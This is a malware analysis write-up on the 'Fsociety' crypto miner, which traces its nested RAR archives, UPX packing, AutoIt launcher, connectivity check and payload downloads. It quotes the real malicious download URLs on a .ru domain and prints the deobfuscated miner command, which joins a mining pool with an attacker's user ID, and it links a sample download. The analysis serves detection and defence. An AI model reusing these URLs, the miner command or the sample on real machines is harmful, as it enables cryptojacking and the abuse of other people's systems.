To Kill The Mocking Porn - Fsociety Crypto Miner

malware analysis fsociety crypto miner
Fsociety is a crypto miner that hides behind multiple layers of obfuscation, Russian porn sites, and trickery.
Filename
fsociety_soft.exe
MD5
dfafd55bc9a0e84eafada04a5f21aead
Sample
Download Sample
Video

INTRODUCTION

Fsociety_soft.exe is either paying homage to Fsociety from the TV show Mr. Robot, or posing as some kind of legitimate fanboy application; regardless, the application is certainly dangerous. 

ANALYSIS

We begin by extracting the main executable which is a self-extracting RAR archive. The file extracted is named WINDOWS.exe and is itself another self-extracting RAR archive (RAR-ception).

The file extracted from the 2nd archive is also named WINDOWS.exe and is UPX packed. A quick unpacking of this file reveals the final launcher and it's embedded AUTOIT3 script.


 Once running, WINDOWS.exe connects to iplogger.com. If a connection is unable to be made the program will exit. This is most likely an anti-analysis trick which is easily bypassed by setting up rules to pass traffic to the domain or simply respond with what the malware is looking for from the site.
Once connectivity is confirmed, WINDOWS.exe will connect to the following .RU domain and download additional files:

http://porntovirt.ru/075/Security.exe
http://porntovirt.ru/075/system.exe
http://porntovirt.ru/075/1.bat

At the time of this analysis the only file hosted on the domain was 1.bat. The other files were non-existent. 
Performing a directory traversal back to the main page we are greeted with the following (blurred for article):

Clicking the button at the bottom of the page we are then greeted with the following (blurred for article):



Again, clicking the button brings us to the final location which is a redirection to a Google drive file that no longer exists. This could be remnants of a past attack hosting a malicious file.




Porn site detour aside, 1.bat is a highly obfuscated batch file which is responsible for launching the crypto mining software.


 Deobfuscating this VERY long script essentially boils down to the following command:

C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k

This will launch two instances of the mining software (it repeats the command) and connects to the MINERGATE bitcoin mining pool. We can see in red the USERID of the individual where the mined bitcoin will be distributed lemoh4uk.sagmail.com.

When running at full capacity, the two mining programs will take up significant system resources as indicated by this graph immediately after infection:

DETECTION

There are many VirusTotal results for the later stages of this file (after the archive is extracted and payload is unpacked from UPX). The best mitigation for the early stages of this malware is to disallow self-extracting RAR files and quarantine anything UPX packed. There's no reason to have it in a business environment.

CONCLUSION

Fsociety is a crypto miner that hides behind multiple layers of obfuscation, porn sites, and trickery. The initial stages of obfuscation should be blocked by most businesses and be sure to check AlienVaults IOC's for additional blocking.